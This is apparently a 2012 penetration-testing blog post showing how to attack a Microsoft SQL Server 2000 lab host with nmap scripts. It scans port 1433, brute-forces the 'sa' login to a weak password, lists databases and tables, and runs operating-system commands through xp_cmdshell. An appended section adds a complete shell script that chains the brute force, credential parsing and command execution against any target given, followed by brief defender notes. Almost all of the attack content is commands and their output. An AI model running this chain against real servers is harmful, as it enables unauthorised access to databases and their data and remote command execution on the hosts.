NMAP : Attack Mssql
Posted on 2012-10-11 23:03:17
Scanner
  root@Dis9Team:~# nmap 5.5.5.3 -sV 5.5.5.3 -p1433 -vv
  # the target is given twice on this command line, so nmap counts it as two
  # hosts and prints the same report twice below

  Starting Nmap 5.21 ( http://nmap.org ) at 2012-09-20 23:32 PDT
  NSE: Loaded 4 scripts for scanning.
  Initiating ARP Ping Scan at 23:32
  Scanning 2 hosts [1 port/host]
  Completed ARP Ping Scan at 23:32, 0.10s elapsed (2 total hosts)
  Initiating Parallel DNS resolution of 2 hosts. at 23:32
  Completed Parallel DNS resolution of 2 hosts. at 23:32, 0.26s elapsed
  Initiating SYN Stealth Scan at 23:32
  Scanning 2 hosts [1 port/host]
  Discovered open port 1433/tcp on 5.5.5.3
  Discovered open port 1433/tcp on 5.5.5.3
  Completed SYN Stealth Scan at 23:32, 0.10s elapsed (2 total ports)
  Initiating Service scan at 23:32
  Scanning 2 services on 2 hosts
  Completed Service scan at 23:32, 11.00s elapsed (2 services on 2 hosts)
  NSE: Script scanning 2 hosts.
  NSE: Script Scanning completed.
  Nmap scan report for 5.5.5.3
  Host is up (0.00015s latency).
  Scanned at 2012-09-20 23:32:32 PDT for 12s
  PORT     STATE SERVICE  VERSION
  1433/tcp open  ms-sql-s Microsoft SQL Server 2000 8.00.2039; SP4
  MAC Address: 00:0C:29:03:16:F8 (VMware)
  Service Info: OS: Windows

  Nmap scan report for 5.5.5.3
  Host is up (0.00022s latency).
  Scanned at 2012-09-20 23:32:32 PDT for 12s
  PORT     STATE SERVICE  VERSION
  1433/tcp open  ms-sql-s Microsoft SQL Server 2000 8.00.2039; SP4
  MAC Address: 00:0C:29:03:16:F8 (VMware)
  Service Info: OS: Windows

1433/tcp open ms-sql-s Microsoft SQL Server 2000 8.00.2039; SP4

PASSWD
  root@Dis9Team:/tmp# cd /pen/nmap/share/nmap/scripts/
  root@Dis9Team:/pen/nmap/share/nmap/scripts# wget http://nmap.org/svn/scripts/ms-sql-brute.nse


Brute force. NAME and PASS are the wordlists in the /tmp directory
  root@Dis9Team:/tmp# nmap -p 1433 --script ms-sql-brute --script-args userdb=name,passdb=pass 5.5.5.3

  Starting Nmap 5.51 ( http://nmap.org ) at 2012-09-20 23:42 PDT
  Nmap scan report for 5.5.5.3
  Host is up (0.00021s latency).
  PORT     STATE SERVICE
  1433/tcp open  ms-sql-s
  | ms-sql-brute:
  |_  sa:123456 => Login Success
  MAC Address: 00:0C:29:03:16:F8 (VMware)

  Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds


Select
  root@Dis9Team:~# nmap -p 1433 --script ms-sql-query --script-args mssql.username=sa,mssql.password=123456,ms-sql-query.query="SELECT @@version" 5.5.5.3
  # nmap 5.51 reads the query from mssql-query.query (see the usage hint in the
  # output); the ms-sql-query.query argument used here was not picked up, so the
  # script ran its default query "SELECT @@version version" instead

  Starting Nmap 5.51 ( http://nmap.org ) at 2012-09-20 23:47 PDT
  Nmap scan report for 5.5.5.3
  Host is up (0.00021s latency).
  PORT     STATE SERVICE
  1433/tcp open  ms-sql-s
  | ms-sql-query: (Use --script-args=mssql-query.query='<QUERY>' to change query.)
  |   SELECT @@version version
  |   version
  |   =======
  |   Microsoft SQL Server  2000 - 8.00.2039 (Intel X86)
  |           May  3 2005 23:18:38
  |           Copyright (c) 1988-2003 Microsoft Corporation
  |_          Desktop Engine on Windows NT 5.2 (Build 3790: Service Pack 2)
  MAC Address: 00:0C:29:03:16:F8 (VMware)

  Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
  root@Dis9Team:~#


GET tables
  root@Dis9Team:~# nmap -p 1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=123456 5.5.5.3

  Starting Nmap 5.51 ( http://nmap.org ) at 2012-09-20 23:48 PDT
  Nmap scan report for 5.5.5.3
  Host is up (0.00027s latency).
  PORT     STATE SERVICE
  1433/tcp open  ms-sql-s
  | ms-sql-tables:
  |   pen
  |     table        column        type        length
  |     =====        ======        ====        ======
  |     products        id        int        4
  |     products        prodName        varchar        50
  |     users        userId        int        4
  |     users        userName        varchar        50
  |     users        userPass        varchar        20
  |
  |   Restrictions
  |     Output restricted to 2 tables (see mssql-tables.maxtables)
  |     Output restricted to 5 databases (see mssql-tables.maxdb)
  |_    No filter (see mssql-tables.keywords)
  MAC Address: 00:0C:29:03:16:F8 (VMware)

  Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds
  root@Dis9Team:~#


cmdshell
  root@Dis9Team:~# nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=123456,ms-sql-xp-cmdshell.cmd="ipconfig" 5.5.5.3
  # as with ms-sql-query, nmap 5.51 reads the command from
  # mssql-xp-cmdshell.cmd (see the usage hint), so the script ran its default
  # command "ipconfig /all" rather than the "ipconfig" requested here

  Starting Nmap 5.51 ( http://nmap.org ) at 2012-09-20 23:50 PDT
  Nmap scan report for 5.5.5.3
  Host is up (0.00027s latency).
  PORT     STATE SERVICE
  1433/tcp open  ms-sql-s
  | ms-sql-xp-cmdshell: (Use --script-args=mssql-xp-cmdshell.cmd='<CMD>' to change command.)
  |   ipconfig /all
  |   output
  |   ======
  |
  |   Windows IP Configuration
  |
  |      Host Name . . . . . . . . . . . . : fuzzexp-f60914c
  |      Primary Dns Suffix  . . . . . . . :
  |      Node Type . . . . . . . . . . . . : Hybrid
  |      IP Routing Enabled. . . . . . . . : No
  |      WINS Proxy Enabled. . . . . . . . : No
  |      DNS Suffix Search List. . . . . . : localdomain
  |
  |   Ethernet adapter ,0\xDE\xA5:
  |
  |      Connection-specific DNS Suffix  . : localdomain
  |      Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
  |      Physical Address. . . . . . . . . : 00-0C-29-03-16-F8
  |      DHCP Enabled. . . . . . . . . . . : Yes
  |      Autoconfiguration Enabled . . . . : Yes
  |      IP Address. . . . . . . . . . . . : 5.5.5.3
  |      Subnet Mask . . . . . . . . . . . : 255.255.255.0
  |      Default Gateway . . . . . . . . . : 5.5.5.2
  |      DHCP Server . . . . . . . . . . . : 5.5.5.100
  |      DNS Servers . . . . . . . . . . . : 5.5.5.2
  |      Primary WINS Server . . . . . . . : 5.5.5.2
  |      Lease Obtained. . . . . . . . . . : 2012年9月21日 14:45:11
  |      Lease Expires . . . . . . . . . . : 2012年9月21日 15:15:11
  |_
  MAC Address: 00:0C:29:03:16:F8 (VMware)

  Nmap done: 1 IP address (1 host up) scanned in 0.68 seconds
  root@Dis9Team:~#
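The five manual steps above (service scan, ms-sql-brute, ms-sql-query, ms-sql-tables, ms-sql-xp-cmdshell) chained into one script, as an added example that is not part of the original post. It assumes nmap is on PATH, that the wordlists `./name` and `./pass` exist in the current directory as they do in the post, and that the target is authorised for testing; the helper names `parse_brute_creds`, `mssql_script_args` and `run_chain` are this example's own.

```shell
#!/bin/sh
# Added example, not code from the original post: runs the nmap ms-sql-*
# NSE scripts shown above end to end. Assumes nmap on PATH and the
# wordlists ./name and ./pass (as in the post) in the working directory.

# Parse ms-sql-brute output on stdin into "user password" lines.
# Handles the 5.x layout ("|_  sa:123456 => Login Success") and the
# current indented layout under "Credentials found:".
parse_brute_creds() {
    sed -n \
        -e 's/^|[_ ]*//' \
        -e 's/^[[:space:]]*//' \
        -e 's/^\([^:]*\):\(.*\) => Login Success[[:space:]]*$/\1 \2/p'
}

# Build a --script-args value for the post-auth ms-sql-* scripts.
# $1 user, $2 password, $3 optional argument suffix ("query.query" or
# "xp-cmdshell.cmd"), $4 its value. The value is emitted under both the
# current name (ms-sql-<suffix>) and the older nmap 5.x name
# (mssql-<suffix>); the one the installed script does not read is
# ignored, so the intended query/command runs instead of the default.
mssql_script_args() {
    args="mssql.username=$1,mssql.password=$2"
    if [ -n "$3" ]; then
        args="$args,ms-sql-$3=\"$4\",mssql-$3=\"$4\""
    fi
    printf '%s\n' "$args"
}

# Full chain against one target on 1433/tcp.
run_chain() {
    target=$1
    # 1. service/version check, plus ms-sql-info for instance details
    nmap -p 1433 -sV --script ms-sql-info "$target"
    # 2. brute force with the wordlists from the post
    creds=$(nmap -p 1433 --script ms-sql-brute \
                 --script-args userdb=name,passdb=pass "$target" | parse_brute_creds)
    if [ -z "$creds" ]; then
        echo "ms-sql-brute: no valid logins for $target" >&2
        return 1
    fi
    # 3. post-auth enumeration and command execution with every login found
    printf '%s\n' "$creds" | while read -r user pass; do
        nmap -p 1433 --script ms-sql-query \
             --script-args "$(mssql_script_args "$user" "$pass" query.query 'SELECT @@version')" "$target"
        nmap -p 1433 --script ms-sql-tables \
             --script-args "$(mssql_script_args "$user" "$pass")" "$target"
        nmap -p 1433 --script ms-sql-xp-cmdshell \
             --script-args "$(mssql_script_args "$user" "$pass" xp-cmdshell.cmd 'whoami')" "$target"
    done
}

# Only touch a live target when one is given: sh mssql_chain.sh 5.5.5.3
if [ $# -ge 1 ]; then
    run_chain "$1"
fi
```

Two things the outputs above already show are worth keeping in mind. The usage hints ("Use --script-args=mssql-query.query=..." and the default `ipconfig /all` running instead of the requested `ipconfig`) mean nmap 5.51 read these arguments as `mssql-query.query` and `mssql-xp-cmdshell.cmd`, while current nmap uses `ms-sql-query.query` and `ms-sql-xp-cmdshell.cmd`; the helper passes both spellings so the intended value is honoured on either version. And what turns a weak `sa` password into command execution on the host is xp_cmdshell being available to that login, which on SQL Server 2000 it is by default; on SQL Server 2005 and later it is disabled by default and needs a sysadmin login to enable, so both the `sa` login over the network and any sp_configure change to xp_cmdshell are events a defender should be alerting on.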



